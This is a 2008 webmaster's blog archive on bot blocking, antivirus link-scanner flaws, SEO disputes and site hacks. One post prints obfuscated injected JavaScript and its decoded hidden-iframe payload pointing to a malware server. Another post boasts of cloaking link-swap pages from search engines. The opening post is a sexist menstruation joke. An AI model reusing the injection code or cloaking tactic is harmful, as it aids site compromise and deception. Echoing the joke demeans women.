Sunday, August 24, 2008

Woman Weather Channel

During a discussion with a few of my male friends today it became obvious that some of us could benefit from such an online service.

You could have a widget, perhaps a Google Gadget even, sitting on your desktop that declares your woman's current menstrual state such as:

Today: Slightly Spotty
Then you could click on the widget and look at the 5 day forecast and see what's in store for the week:
Mon: Spotty
Tue: Heavy Flow
Wed: Flow
Thu: Spotty
Fri: Clear
Obviously the paid version I'm tentatively calling "Wife Alert" could also send potentially life saving text messages to your cell phone at appropriate times.

It's 6am on that fateful morning when the text message alarm chirps:
"PMS EMERGENCY! THIS IS A HEAVY FLOW DAY! FORGET THE CHILDREN, GET OUT NOW AND SAVE YOURSELF BEFORE IT'S TOO LATE!"
Perhaps even an advance warning system with even more important information such as converging events that could spell disaster if you fuck up.
"WARNING - HEAVY FLOW AND BIRTHDAY BOTH COMING IN 3 DAYS. DON'T FORGET FLOWERS, PRESENTS AND PARTY AS YOUR LIFE COULD DEPEND ON IT!"
Considering how much physical and mental abuse this could potentially save men, it's even possible your health insurance company would pick up the tab for "Wife Alert" as a standard health benefit.

Just like how the weather channel allows you to look up the weather of other locations around the world, the Woman Weather Channel would allow you to look up celebrities online.

Could you imagine tuning in to watch The View when you knew two of the hosts were going to have a bad day at the same time?

The Woman Weather Channel could also be an indispensable resource for anyone in business or politics that could simply avoid any bosses, colleagues or co-workers known to be having a "bad day" until her weather report showed all clear.

The possibilities are endless so tune into the Woman Weather Channel today and all you husbands subscribe to "Wife Alert" as it could be your life it saves!

Thursday, August 14, 2008

How Flawed is Your Anti-Virus?

Some of the anti-virus web surfing protection products are permitting some very risky behavior due to flaws in their basic design. For instance, some of them allow your browser to willingly go to known bad locations they have in their database until something catastrophic gets downloaded. Once the file is downloaded it might be too late so there's the real problem.

Here's a quick example: the site "gcounter.cn" was found in an Invisible IFrame launcher, yet the page with that code was deemed safe. However, when you go to gcounter.cn, which you should NOT do as it's very bad, it downloads a wide variety of things or randomly redirects you to Google of all places. That redirect to Google is probably tossed in there to throw off people trying to figure out if this is the source of the virus, but that's another story.

Anyway, several anti-virus and link scanning products just ignored the fact that this site is known to be bad and let me visit these pages without so much as a warning. Better yet, when I fed some infected pages directly into my browser just to see what happened, they couldn't detect the Invisible IFrame launcher script properly, and even when they did, didn't stop me from running the page at that time or even pop a warning!

Why?

Because gcounter.cn, like many other malware sites, wasn't downloading a bad file at that particular instant. However, a few minutes later the malicious files were flowing from gcounter.cn again and then the anti-virus woke up, finally.

Shouldn't the fact that gcounter.cn downloads any malware be enough of a reason to set off some alarms and stop people dead in their tracks from going there?

Apparently not.

It appears that hackers have a leg up on spoofing the malware scanning software and the anti-virus developers so it's no wonder that machines are getting hacked all over the place.

Although the anti-virus products do add some value to protecting surfers, they unfortunately cause more harm than good by giving a false sense of security. With the massive gaping holes in their technology, the only true way to surf safe is using NoScript, since no javascript whatsoever means no Invisible Iframe launcher tricks.

I'm not going to name which anti-virus products I tested at this time because I'd like to give them time to fix their products before exposing their shoddy methodologies and putting their customers at risk of being more of a target than they already are.

Come on anti-virus writers, get your shit together before I lose my shit and do a real expose!

Addendum:

The one interesting twist in the Invisible Iframe launcher script that I found this time is that it was injected into a common javascript file shared site wide instead of just being inserted into the home page. This is a nasty strategy twist that gives the hackers a bigger bang for their buck by getting more infected pages with a lot less work and the code isn't in the HTML file which is where most people would look first.
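
For anyone who wants to sweep their own files for this, here's a rough sketch in Python of the kind of scan that would catch the plain-text form of the trick. The regex and the name `find_hidden_iframes` are illustrative assumptions, not what any anti-virus product actually does, and an obfuscated script would have to be decoded before this sees anything. Since the code can hide in a shared javascript file, it needs to run over the .js files as well as the HTML.

```python
import re

# Assumption: a "hidden" iframe is one whose tag carries display:none,
# or a width or height of exactly 0. Real launchers vary; this is a sketch.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*(?:display\s*:\s*none|(?:width|height)\s*=\s*['\"]?0\b)[^>]*>",
    re.IGNORECASE,
)

def find_hidden_iframes(text):
    """Return every iframe tag in text that looks deliberately invisible."""
    return HIDDEN_IFRAME.findall(text)

# Hypothetical sample in the style of an injected document.write() call.
sample = (
    "document.write('<iframe src=\"http://example.invalid/x\" "
    "width=480 height=156 style=\"display: none\"></iframe>')"
)
for tag in find_hidden_iframes(sample):
    print("suspicious:", tag)
```

A hit only means "go look at this file", since plenty of legitimate scripts use hidden iframes too.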

Thursday, July 24, 2008

SEO Community in TailSphinn

I tried to support Sphinn's efforts by putting the SphinnIt button on my site to help raise awareness of what they were trying to do with something unique for the SEO community.

Unfortunately, Sphinn devolved into a bunch of Sphamm and when one of their members pointed out how widespread the problem was they banned Edward. OK, Edward (pageoneresults) can push the envelope a little but it wasn't out of disrespect, he was making a very public spectacle to get them off their dead asses to fix the problem.

So EvilGreenMonkey of Sphinn even admitted Edward was right:

The person highlighted in Aaron's post has had their account terminated, there is no need to interact with them further. The findings highlighted in his comments were not new or truely condemning. Yes, people spam Sphinn - we remove the spam. Yes, submit.php URLs were getting indexed - although from Google indexing WP social media plugin links rather than spamming. Fixes to these problems were either already implemented or scheduled for release before said user started his campaign. I'll make no further comment on this post and suggest that we leave it at that.
So instead of saying "Thank you for bringing it to our attention" and "We're working on the problem" with a proposed implementation date, they just ban him and that's when all hell broke loose in the SEO blogosphere.

Not only that, shouldn't the Sphinn members get an apology from Sphinn for forcing us to suffer through all that Sphamm which one simple NOFOLLOW would've stopped from the beginning?

Perhaps Sphinn bears some of the blame here because if "his comments were not new or truely condemning" then you allowed the situation to continue unabated until one of your members simply couldn't take it anymore.

So Sphinn members had to put up with Sphamm for a year and not even a simple apology but they shot the messenger that finally snapped, good going Sphinn.

Right on the heels of this they decide to take a swipe at Kimberly Bock and threatened to ban her for some hypocritical horseshit.
1. Your flame post submitted by another user, which went Hot on Sphinn, was removed due to 26 Desphinns and many complaints.
2. The posts about your personal life had no internet marketing relevance and are seen as off-topic/spam.
So let's review Kimberly's plight as she was a) threatened over a post that someone else submitted to Sphinn and b) told that 2 SEOs getting married isn't news.

Holy mother of horseshit, have they lost their minds?

I find their current heavy handed reputation management tactics too autocratic to support Sphinn anymore simply because the good of the community isn't being served when criticism is swept under the rug and squelched instead of addressed.

The Sphinn button is off my site because I certainly wouldn't want to be associated with all the vapid top 10 lists being submitted and I sure as hell don't want someone yelling at me about material on my site not being suitable in the event someone else Sphinn's it, such as happened to Kimberly.

Maybe someday if Sphinn gets their act together and stops shooting the messengers and they improve the quality of their content, the SphinnIt button will return.

Until that day, SphuckIt!

Sunday, July 06, 2008

iPowerWeb Hacking Continues

Over a year ago I wrote about a bunch of iPowerWeb's shared servers being hacked, and it looked like they were trying to clean it up, but now it's time for round two of hacking.

The latest batch of hacked sites may have a DNS hack as well, I'm not sure that's the case but Alex seems to think it is.

All these sites have the following Whois Name Server entries:

Name Server: NS1.IPOWERDNS.COM
Name Server: NS1.IPOWERWEB.NET
Sure looks like iPowerWeb, right?

But the reverse DNS all goes to IPs on *.static.eigbox.net which links to BIZLAND

Here's a sample of the javascript in this round of site hacking:
eval(unescape("%77%69%6e%64%6f%77%2e%73%74...."));
Don't go to the link below if you know what's good for you, it's not safe.

The javascript above, when decoded, is the following:
window.status='Done';document.write('<iframe name=f2f8f656791 src=\'http:// 58.65.232.*/gpack/index.php?'+Math.round(Math.random()*74880)+'2\' width=480 height=156 style=\'display: none\'></iframe>')
You guessed it, bad things happen at 58.65.232.33 which APNIC claims to be hostfresh.com out of Hong Kong which has a San Francisco mailbox according to their website.
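
If you'd rather decode one of these blobs without letting a browser anywhere near it, treating it as plain text in Python does the job. A small sketch, using only the fragment visible above (the rest of the string stays elided, and `decode_unescape` is just a made-up helper name):

```python
from urllib.parse import unquote

def decode_unescape(encoded):
    """Decode %XX escapes, which covers javascript's unescape() for plain ASCII."""
    return unquote(encoded)

# Only the visible start of the obfuscated string; the remainder is elided.
print(decode_unescape("%77%69%6e%64%6f%77%2e%73%74"))  # prints: window.st
```

Nothing gets executed this way, so the decoded iframe can be read safely before deciding what to block.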

Can someone explain why this exploit site still exists if these guys are doing business with a US address and all hell isn't raining down on their parade?

I don't get it, the web has gone mad...

Tuesday, June 17, 2008

AVG 8 LinkScanner Fiasco Recap

For those of you that might've missed the whole AVG 8 LinkScanner disaster and ensuing AVG reputation nightmare, here's a quick recap and links to places to read all the details.

Webmasters started noticing a rash of distributed IPs with the same user agent, no referrer, and a few other technical issues I won't go into now, that suddenly started pounding their sites:

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)
At first I thought it looked like a botnet scraper but soon someone figured out it was related to the new release of AVG 8 that included a LinkScanner that was amusingly called "Safe Search" which is now not-so-safe since everyone knows how to spoof it.

The story was first broken on WebmasterWorld, then again on The Register, then a follow up on WebmasterWorld and a few other places. The best part of the story on The Register actually unfolds in the comments section which is now over 200 posts but has some good comments if you're willing to wade through it all.

It appears this Safe Search link scanning was a knee jerk reaction to McAfee's SiteAdvisor. SiteAdvisor uses stale search results to flag sites with known exploits. However, Safe Search, much to everyone's dismay, hits all sites in real-time to check for exploits for every single search. The most amusing aspect is that the very AVG feature which is supposed to make the internet safer has been attacking sites and become malware itself.

Here's a list of all the major points so far:

1. AVG 8 appears to be causing an escalating DDoS attack as more and more AVG users upgrade causing some sites to be hit by many thousands of unique IPs per day.

2. AVG's Safe Search is causing webmaster analytics worldwide to be totally skewed unless you filter out the ";1813" user agent.

3. AVG 8 is exposing their customer information to sites their customers didn't even visit and potentially setting them all up for some future exploit. They'll be targets for direct marketing to switch to a new AV product at a minimum with savvy affiliates making out like bandits.

4. The Safe Search link scanner has the potential to automatically access sites that aren't allowed at work, could violate your ISP's AUP or be illegal in some jurisdictions. This could result in reprimand, losing your ISP or potentially being flagged in honeypot sites for illicit activities.

5. The malicious sites can already fake the Safe Search code which appears to put users of the free AVG 8 at risk. The risk is because you only get Safe Search, the link scanner which is being spoofed, but you don't get Safe Surf, which stops HTML exploits as you load the page. It appears you need a paid version of AVG 8 to actually be protected from online exploits so be careful where you surf using the free version of AVG 8.
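
For point 2, filtering the scanner out of your stats can be as simple as the sketch below. It assumes your log entries have already been parsed into dicts with a `user_agent` key, which is a hypothetical layout, and it keys purely on the ";1813" marker from the user agent shown earlier, so it's only as good as that marker staying put.

```python
AVG_MARKER = ";1813"  # the tell-tale suffix from the user agent above

def is_avg_linkscanner(user_agent):
    """True when the user agent carries the ';1813' marker."""
    return AVG_MARKER in user_agent

def filter_hits(hits):
    """Drop entries sent by the scanner; hits is a list of dicts (assumed layout)."""
    return [h for h in hits if not is_avg_linkscanner(h["user_agent"])]

hits = [
    {"path": "/", "user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"},
    {"path": "/", "user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"},
]
print(len(filter_hits(hits)))  # prints: 1
```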


Well, that's the recap in a nutshell.

This just goes to show you how the best intentions can have disastrous results when people don't think about the consequences of their actions, especially when dealing with an installed base of this scale.

Thursday, May 22, 2008

Did CSC's Spybot Get Caught?

Looks like yet another corporate compliance spybot is hitting our servers, not like we need yet another spybot.

There's only one IP out of this entire range that consistently hits my servers.

OrgName: Corporation Service Company
OrgID: CORPO-9-Z
NetRange: 165.160.0.0 - 165.160.255.255

They claim to crawl the web:

Our proprietary technology scans and digests web pages, images and other Internet content around the clock to locate critical occurrences of online brand abuse.
Yet again, nobody has ever seen a crawler name in use so I'll hazard a guess it doesn't read or respect robots.txt when it's crawling, or possibly trespassing, on our servers.

I'd post more about the specifics on this one but I really don't want them to wise up too much because some of the things their crawler does, while pretending to be a browser, trips several alarms in my bot blocker.

Kind of hard to digest web pages when you're busy digesting error pages instead!

Just another day of the internet version of Spy vs Spy.

Monday, May 12, 2008

Impact On Your Bandwidth Will Be Minimal My Ass

How often do we see that happy line of horse shit spread by every new startup that crawls the web about how minimal its impact will be?

Every fucking one of them claims it but when you add them all together the bot traffic is quickly exceeding the human traffic.

Who the fuck am I kidding, on most sites the bots clearly outnumber the humans in pages read on a daily basis.

First we put the big search engines on top of the heap with Google, Yahoo and MSN crawling the crap out of your servers daily. Just the three of these guys can easily read as many pages as 10K visitors a day. Then throw in the wannabe search engines like Ask, Gigablast, Snap, Fast, etc. ad nauseam and it's over the top.

Now expand that list to include the international search engines like Baidu, Sogou, Orange's ViolaBot, Majestic12, Yodao, and on and on, tons of 'em.

Then we have all the spybots that feel entitled to crawl your site like Picscout, Cyveillance, Monitor110, Picmole, RTGI, and on and on.

Next add up all the specialty niche bots like Become, Pronto, OptionCarriere, ShopWiki, and all sorts of shit too numerous to mention.

Pile on top of this all the free fucking tools that every little shithead and make believe company uses to scrounge the 'net for god knows what, and god's not telling, like Nutch and Heritrix, plus the web downloaders, offline readers, and more.

Don't forget, many of these so-called search engines and shit now want screen shots as well so after they crawl your page they send a copy of Firefox or something to your site to download every page again plus every fucking image, never cached, over and over and over.

Did I forget to mention directories?

They'll want to link check you and get screen shots as well, don't leave them out or they'll feel fucking neglected.

Wait, there's more, those social sites like Eurekster, Jeteye, etc. that let people link to your shit and then come back banging on your site all the time to make sure that shit's still valid.

Then add up all the RSS feed readers and aggregators that pull down your RSS feeds that nobody ever fucking reads. Not to mention the RSS feed finders like IEAutodiscovery that run amok on your site just looking for RSS feeds ... FUCK!

If you run affiliate programs you have CJ quality bot or some shit hitting your site and if you run ads then the Google quality bot, it's always something.

Don't forget the assholes running the dark underbelly of the web with all the scrapers, spam harvesters, forum, blog and wiki spammers, botnets and other malicious shit pounding on our sites daily.

Add on top of all this shit Firefox, Google Web Accelerator and now AVG's toolbar all pre-fetching pages that will most likely never be read and holy shit, we're being swamped!

OK, now that we've identified all this bot traffic, where's all the fucking people?

Of course you think all those hits from MSIE and Firefox are people, right?

Hell no!

Are you out of your fucking mind?

Those hits are the scrapers, screen shot makers and companies like Cyveillance and Picscout that don't want you to stop them from crawling your site so they just pretend to be humans to get past the bot blockers.

Well guess what?

There are no fucking people on your site. The internet is now run for and used exclusively by bots.

Apparently you missed the memo.

Comparing Effectiveness of Anti-Virus Web Protection Methods

There are three basic methods being used at the moment to protect web surfers from potential dangers: static (stale), active and passive.

Static Web Protection

Various companies use the static method which relies on crawling the web in advance to find vulnerabilities and then attempt to warn visitors about these problems as they are about to visit a web site. McAfee's SiteAdvisor and Google both take this approach and it's obviously only as good as your last scan and the malware can easily be cloaked and hidden from these somewhat obvious crawlers. Besides easily being fooled with cloaking, the data is always stale meaning sites good even 10 minutes ago could now be infested with malware and sites previously infested could have been cleaned.

This method isn't optimum for anyone and can be a nightmare for websites tagged as bad to get off the warning list assuming they ever find out they're on it in the first place as their business goes down in flames from traffic going elsewhere.

Active Web Protection

The latest AVG 8 includes a Link Scanner and AVG Search-Shield which aggressively checks pages in Google search results that you're about to visit in real time to help protect the surfer. Unfortunately, AVG made several mistakes, some that could be deemed fatal flaws, which allow this technology to be easily identified so that malware and phishing sites can cloak to avoid AVG's detection. Even worse for webmasters is that AVG pre-fetches pages in search results and as adoption of this latest AVG toolbar increases, it is quickly turning into a potential DoS attack on popular sites that show up at the top of Google's most popular searches.

While I think AVG's intentions were good, their current implementation easily identifies every customer using their product and causes webmasters needless bandwidth issues that could be easily resolved on their part with a cache server.

Passive Web Protection

The method used by Avast's Anti-Virus is to use a transparent HTTP proxy, meaning that all of your HTTP requests pass through an invisible intermediate proxy service that scans for potential problems in the data stream in real-time. The data is always fresh, checked in real-time, the user agent doesn't change and there are no pre-fetches or needless redundant hits on websites.

The only downside is you don't know the site is bad in advance but that can easily be the case with static protection due to stale data and/or cloaking and active protection due to cloaking.


The Best of All


While the three approaches all have their potential problems it appears a combination of all three is probably the best approach.

Bad Site Database:
The SiteAdvisor/Google type database approach is good to log all known bad sites so they don't get a second chance to fool the other methods with cloaking once they are caught. This cuts down on redundantly checking known bad sites until the webmaster cleans it up and requests a review to clear their site's bad name.

Perhaps the Bad Site database concept needs to become a non-profit dot org so that all of the anti-virus companies can freely feed and use this database without all the corporate walls built up around the ownership of the data for the greater good, something like a SpamHaus type of thing or perhaps merged into SpamHaus.

Optimized Pre-Screening:
The AVG approach of pre-screening a site could be optimized by fixing the toolbar's user agent so it's not detectable and using a shared cache server to avoid behaving like a DoS attack on popular websites. The beauty is that the collective mind of all these toolbars with an undetectable user agent avoids the cloaking used to thwart detection associated with known crawlers. If the toolbar fed the results of these bad sites to the Bad Site Database, then there's a win-win for everyone.

Transparent Screening:
The final approach, the HTTP proxy screening used by Avast, should still be performed so that any site that manages to stay out of the bad site database and still eludes the active pre-screening of pages would hopefully get snared as the page loads into the machine.
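
The three layers can be sketched as one function. Everything here is an assumption made for illustration: `layered_check`, the `prescreen`, `scan_body` and `fetch` callables, and the in-memory set standing in for a shared Bad Site Database. No vendor's product works exactly this way; the point is only the order of the checks and the feedback into the database.

```python
from urllib.parse import urlparse

def layered_check(url, bad_sites, prescreen, scan_body, fetch):
    """Run the three checks in order and return (verdict, stage)."""
    host = urlparse(url).hostname or ""
    # Stage 1: known bad sites never get a second chance to cloak.
    if host in bad_sites:
        return ("blocked", "bad site database")
    # Stage 2: pre-screen the page before the visit (hypothetical callable).
    if prescreen(url):
        bad_sites.add(host)  # feed the finding back into the database
        return ("blocked", "pre-screening")
    # Stage 3: scan the actual data stream as the page loads.
    if scan_body(fetch(url)):
        bad_sites.add(host)
        return ("blocked", "transparent screening")
    return ("allowed", "clean")

# Toy stand-ins for the real scanners, just to show the flow.
db = {"bad.example"}
verdict = layered_check(
    "http://bad.example/page", db,
    prescreen=lambda u: False,
    scan_body=lambda body: "iframe" in body,
    fetch=lambda u: "",
)
print(verdict)
```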

Summary

When you pile up all of this security the chances of failure still exist but the end user is protected and informed as much as humanly possible from all of the threats present.

It would certainly be nice to see some of the anti-virus providers combine their efforts as outlined above to make the internet a safer place to visit.

Sunday, April 27, 2008

Off By More Than One

Can you believe that someone is actually surfing the web using some free browser called Off By One that doesn't appear to have been updated in the last 2 years?

The user agent is as follows:

"Mozilla/6.0(compatible;OffByOne;Windows 2000)"
The irregular formatting convention triggered the bot trap with the lack of spaces alone.
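
A check of that kind could be as simple as the sketch below. It is an illustration only, not the actual bot trap rule: the function name and the two spacing tests are assumptions based on how browser user agents are conventionally laid out, with a space before the opening parenthesis and after each semicolon.

```python
def has_irregular_spacing(user_agent):
    """Flag Mozilla-style user agents that lack the usual spaces."""
    if not user_agent.startswith("Mozilla/"):
        return False
    # Conventional form: "Mozilla/x.y (token; token; ...)"
    no_space_before_paren = "(" in user_agent and " (" not in user_agent
    no_space_after_semicolon = ";" in user_agent and "; " not in user_agent
    return no_space_before_paren or no_space_after_semicolon

print(has_irregular_spacing("Mozilla/6.0(compatible;OffByOne;Windows 2000)"))
print(has_irregular_spacing("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"))
```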

Then it claims to be Mozilla 6.0 when it's probably Mozilla 3.0 at best.

Considering how few times, if ever, this browser has visited, it's obviously very rare.

Maybe some online nerd activist will get it declared as an endangered online species so it will become protected by law.

Don't laugh, you know it'll happen eventually...

Sunday, April 20, 2008

Reciprocal Link Exchange? Let's Swap!

For years I've been deleting all those emails asking me to exchange links and I won't swap links with any of that crap.

Suddenly I've had an epiphany and YES!, now I'll swap links with you, no problem!

I'm only agreeing to swap links as requested.

I'm not using NOFOLLOW on those links as requested.

You can see my links when you visit, online and visible as agreed.

Unfortunately my link swapping page will never be seen by Google, Yahoo, MSN or any other search engine but you'll see it just fine.

I'm going to hold up my end of the bargain, we swapped links, how about you?

Kaushik, What Freaking Experiments?

I found this user agent coming out of Microsoft's Area 131 requesting that people "contact kaushik for these experiments" that kept hitting one of my servers.

131.107.0.96 "contact kaushik for these experiments"
So I did a little data mining of my own and searched Microsoft and couldn't decide if this experiment was from Kaushik #1 or Kaushik #2.

Both Kaushiks appear to be working for the Data Management, Exploration and Mining Group (DMX) at Microsoft, but which one ran this experiment?

OK, will the real Kaushik running these experiments please stand up?

BTW, was your experiment finding sites running bot blockers?

If so, you succeeded and your requests were stopped. ;)

DNS Right But User Agent Wrong

Ran into a user agent from DNSRight today that claimed to be some link check tool that doesn't appear on their site.

66.240.236.220 "GET / "
"http://www.dnsright.com/" "DNSRight.com WebBot Link Ckeck Tool. Report abuse to: dnsr@dnsright.com"
So I ran some of their other tools that don't identify themselves at all.
66.240.236.220 "GET / HTTP/1.1" "-" "-"
They host this mess at cari.net so just block 'em.
OrgName: California Regional Intranet, Inc.
NetRange: 66.240.192.0 - 66.240.255.255
CIDR: 66.240.192.0/18
No more DNS Right or Left, it's now DNS Gone.
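
If your blocking happens in code rather than in the firewall, the CIDR above drops straight into Python's standard `ipaddress` module. A minimal sketch, where `is_blocked` is a hypothetical helper name:

```python
import ipaddress

# The range from the whois output above.
BLOCKED = ipaddress.ip_network("66.240.192.0/18")

def is_blocked(ip):
    """True when the address falls inside the blocked network."""
    return ipaddress.ip_address(ip) in BLOCKED

print(is_blocked("66.240.236.220"))  # the address from the log lines above
print(BLOCKED[0], "-", BLOCKED[-1])  # first and last address in the block
```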

Thursday, April 17, 2008

Picmole, Yet Another Spybot!

There must be good money spying on everyone because it seems a new company springs up almost weekly trying to stake their claim in this new gold rush.

How many fucking spybots do we need?

Today on the spybot circuit we're serving up a helping of Picmole that's using heritrix to do its crawling. Surprisingly it still checks robots.txt but who knows if they'll honor it down the road because honoring robots.txt conflicts with accomplishing their stated goals.

Identifying their spider properly and crawling from easily identifiable IPs will also present them problems as their activities increase but being a new service they'll soon figure that out and probably go stealth like all the rest.

208.109.189.127 [ip-208-109-189-127.ip.secureserver.net.] requested 1 pages as "Mozilla/5.0 (compatible; heritrix/1.12.0 +http://www.picmole.com)"
Sorry, but your bot hit a firewall on your first attempt.

Abort, Retry, Ignore?

Favcollector Bandwidth Waster

Here's another product of Canada doing the stupidest shit ever seen, collecting favicons.

It came and grabbed my icon, then hit the home page which the bot blocker promptly stopped, so who knows what else it would've done beyond that.

66.207.217.138 [gaspra.crazylogic.net.] "Favcollector/2.0 (info@favcollector.com http://www.favcollector.com/)"
From their FAQ:
Favcollector is a spider that searches the internet for favicons. It downloads and stores these favicons for each site it visits. It will go back once a month to see if the favicon has changed and will download the new icon if it is has, effictivly creating an archive of all favicons on the internet.
Spider?

Spider my ass...

Spiders ask for robots.txt files, read them, and go away.

Not this piece of shit as it just comes and it takes what it wants without regard to the webmaster's wishes.

Not only that, a bunch of trademarked icons are now on their site without permission which will most likely make some crazed trademark enforcers start jumping up and down once they find that site.

BTW, run a damn spell checker on your site as the word is effectively, not "effictivly" unless that's the Canadian spelling.

Canasasearchbot For Canasians, Oh Canasa!

It's hard to resist commenting on a bot that can't even spell its own name or its country name correctly.

206.248.137.34 [mycanadasearch.ca.] "canasasearchbot(http://www.mycanadasearch.ca/robots.html)"
However they got it right on their robots page:
User-agent: canadasearchbot
It did ask for robots.txt but who knows if it was looking for "canasasearchbot" or "canadasearchbot", total crap shoot.
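
Here's why the spelling matters, sketched with Python's standard `urllib.robotparser`. The robots.txt rules below are hypothetical (a webmaster banning the bot under its documented name), and how the bot's own parser matches names is unknown, so take this as one parser's behavior, not theirs.

```python
from urllib.robotparser import RobotFileParser

def allowed(robots_lines, user_agent, url="/"):
    """Ask Python's robots.txt parser whether user_agent may fetch url."""
    parser = RobotFileParser()
    parser.parse(robots_lines)
    return parser.can_fetch(user_agent, url)

# Hypothetical rules written against the name on their robots page.
rules = ["User-agent: canadasearchbot", "Disallow: /"]

print(allowed(rules, "canadasearchbot"))  # the documented name
print(allowed(rules, "canasasearchbot"))  # the name the bot actually sends
```

With this parser the documented name is refused while the misspelled one sails through, because no rule group matches it.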

I tried their little search engine and it took it a really long time to come back with some really bad results.

Here's a "search tip", try searching your log file and examine what your crawler is putting in that log file before turning it loose on the world.

Nothing like that fine Canadian quality, eh?


Monday, April 14, 2008

Mozshot Tries Taking a Screenshot

Yet another Firefox-based screen shot tool hit my other site today just in time to take a screen shot of an error message telling them they weren't allowed to take screen shots without permission.

Details:

61.206.125.245 [tempest.nemui.org.]
"Mozilla/5.0 (Gecko/20070310 Mozshot/0.0.20070628; http://mozshot.nemui.org/)"
This thing appears to be open source, oh joy...

Friday, April 11, 2008

RTGI - The French Social Media Spybot

Yet another social media mining operation designed to track every bit of intel said about brands, people, politics and more.

From a translation of their site:

Our solutions simplify the identification of influential communities and monitoring of their conversations, to the benefit of businesses, communication agencies or research institutes.

RTGI's approach allows the analysis of the links and content generated by the citizens, journalists, consumers or activists, to draw the contours of communities conversations around your issues, brands and products and their real impact on your image online. RTGI have elaborated the linkfluence to give a unit of reliable measurement of the influence of the social web sites.
The highlighting was added to help you see how it facilitates spying on your ass without going to much effort to do so.

Heck, the French government is in their list of clients!
  • Information Service (GIS) government
  • Ministry of the Economy, Finance and Employment
  • Picardy Regional Council (RENUPI)
Sheesh, didn't need to translate as they have an English .EU version too.

Oh well, I'm not rewriting it!

Continuing on...

George Orwell obviously didn't anticipate the internet and he was off by a few years, 24 to be exact, but his overall message of Big Brother watching us in 1984 is finally coming true in 2008.

Anyway, back to the details:
"mozilla/5.0 (compatible; RTGI; http://rtgi.fr/)"
The IPs they operate from are:
88.191.50.170 -> sd-8985.dedibox.fr.
91.121.108.180 -> t800.rtgi.eu.
91.121.25.182 -> merlin.rtgi.eu.
91.121.25.184 -> r2d2.rtgi.eu.
91.121.79.160 -> c3po.rtgi.eu.
The old address of 88.191.50.170 doesn't appear to be active since 04/13/2007 so I probably wouldn't worry about that too much unless you just want to block that dedicated hosting range for good measure.
inetnum: 88.191.3.0 - 88.191.248.255
netname: FR-DEDIBOX
descr: Dedibox SAS
descr: Paris, France
route: 88.160.0.0/11
The dedicated host they currently use has this range of IPs:
inetnum: 91.121.0.0 - 91.121.31.255
netname: OVH
descr: OVH SAS
descr: Dedicated Servers
descr: http://www.ovh.com
So there you go, another way to make your site part of the anti-social media by keeping the snoops out.
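
Whois hands you a start and end address, but most block lists want CIDR notation. Python's standard `ipaddress` module can convert one to the other; `range_to_cidrs` below is a hypothetical helper name, and the sketch only does arithmetic on the numbers quoted above.

```python
import ipaddress

def range_to_cidrs(first, last):
    """Convert an inetnum-style range into the CIDR blocks that cover it."""
    networks = ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last)
    )
    return [str(net) for net in networks]

cidrs = range_to_cidrs("91.121.0.0", "91.121.31.255")
print(cidrs)  # prints: ['91.121.0.0/19']

# Check which of the listed crawler addresses that block actually covers.
net = ipaddress.ip_network(cidrs[0])
for ip in ["91.121.108.180", "91.121.25.182", "91.121.25.184", "91.121.79.160"]:
    print(ip, ipaddress.ip_address(ip) in net)
```

By this arithmetic 91.121.25.182 and 91.121.25.184 fall inside that /19 while 91.121.108.180 and 91.121.79.160 do not, so blocking the quoted range alone would miss two of the four.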


Project Rialto's PRCrawler Is Data Mining?

Since I whitelist allowed bots I've had Project Rialto blocked since the beginning but I was curious what they were doing since they first showed up on my radar on 01/23/2008 and kept coming back over and over.

From one of their job ads:

We are designing high-performance algorithms and developing reliable, fault-tolerant and scalable real-time systems that can handle massive volume of data for in-depth analysis of user behavior to enable targeted advertising.

and...

Research and investigate academic and industrial data mining, machine learning and modeling techniques to apply to our specific business case
Oh boy!

It appears they want to crawl our sites and use that information to shove more ads in our face.

Somehow, I don't think so...

If you're going to mine data, shouldn't you get the URLs right?

The site they're attempting to "mine" is on a Linux box where URLs are case sensitive, and my URLs all have upper/lower case in them, yet the PRCrawler only asks for those URLs in all lower case, so even if I let them crawl my site they'd get nothing but 404s.
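
The effect is easy to reproduce in a toy model. The page path below is made up, and the set lookup just stands in for a case-sensitive file system, so treat it as a sketch of the failure and not of any real server.

```python
def status_for(path, pages):
    """Case-sensitive lookup, like a typical Linux-hosted site."""
    return 200 if path in pages else 404

pages = {"/Widgets/BlueWidget.html"}  # hypothetical mixed-case URL

print(status_for("/Widgets/BlueWidget.html", pages))          # as published
print(status_for("/Widgets/BlueWidget.html".lower(), pages))  # as the crawler asks
```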

No wonder their home page says they're a "stealth company" because I'd hide too if I couldn't even get the proper case of the URLs right.

Here's their user agent:
"PRCrawler/Nutch-0.9 (data mining development project; crawler@projectrialto.com)"
They operate from the following IPs:
64.47.51.153
64.47.51.158
67.202.0.157
67.202.0.17
67.202.0.71
67.202.10.65
67.202.18.229
67.202.29.20
67.202.3.112
67.202.3.141
67.202.3.151
67.202.56.219
67.202.58.214
67.202.59.117
67.202.62.162
67.202.62.45
72.44.36.20
72.44.36.8
72.44.37.72
72.44.39.55
The first two were from masergy.com, the rest are all from compute-1.amazonaws.com.
host-64-47-51-153.masergy.com.
host-64-47-51-158.masergy.com.
I haven't seen anything from masergy.com since the initial contact but that's only 2 months ago so who knows.

Don't know where they primed the pump for their data mining operation since they already had lots of information about my site when they attempted to crawl, but since it was all lower case it was completely useless.

I'm just curious if they got my URLs from somewhere already in lower case or if someone there slapped a tolower() around a line of code when importing the URLs into Nutch.
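If you want to check whether a crawler is mangling the case of your URLs, here's a minimal Python sketch. It compares requested paths against the real ones and reports requests that differ only by case. The function name and the sample paths are made up for illustration, and where the two lists come from (access log, sitemap) is left to you.

```python
def find_case_mangled(requested_paths, real_paths):
    """Return (requested, real) pairs where the request differs only by case."""
    # Map the lower-cased form of every real path back to the real path.
    by_lower = {p.lower(): p for p in real_paths}
    mangled = []
    for path in requested_paths:
        real = by_lower.get(path.lower())
        # A case-insensitive hit that is not an exact match means only the case differs.
        if real is not None and real != path:
            mangled.append((path, real))
    return mangled


if __name__ == "__main__":
    # Hypothetical paths, not taken from any real site.
    real = ["/Widgets/BlueWidget.html", "/About.html"]
    asked = ["/widgets/bluewidget.html", "/About.html", "/missing.html"]
    for bad, good in find_case_mangled(asked, real):
        print(bad, "should have been", good)
```

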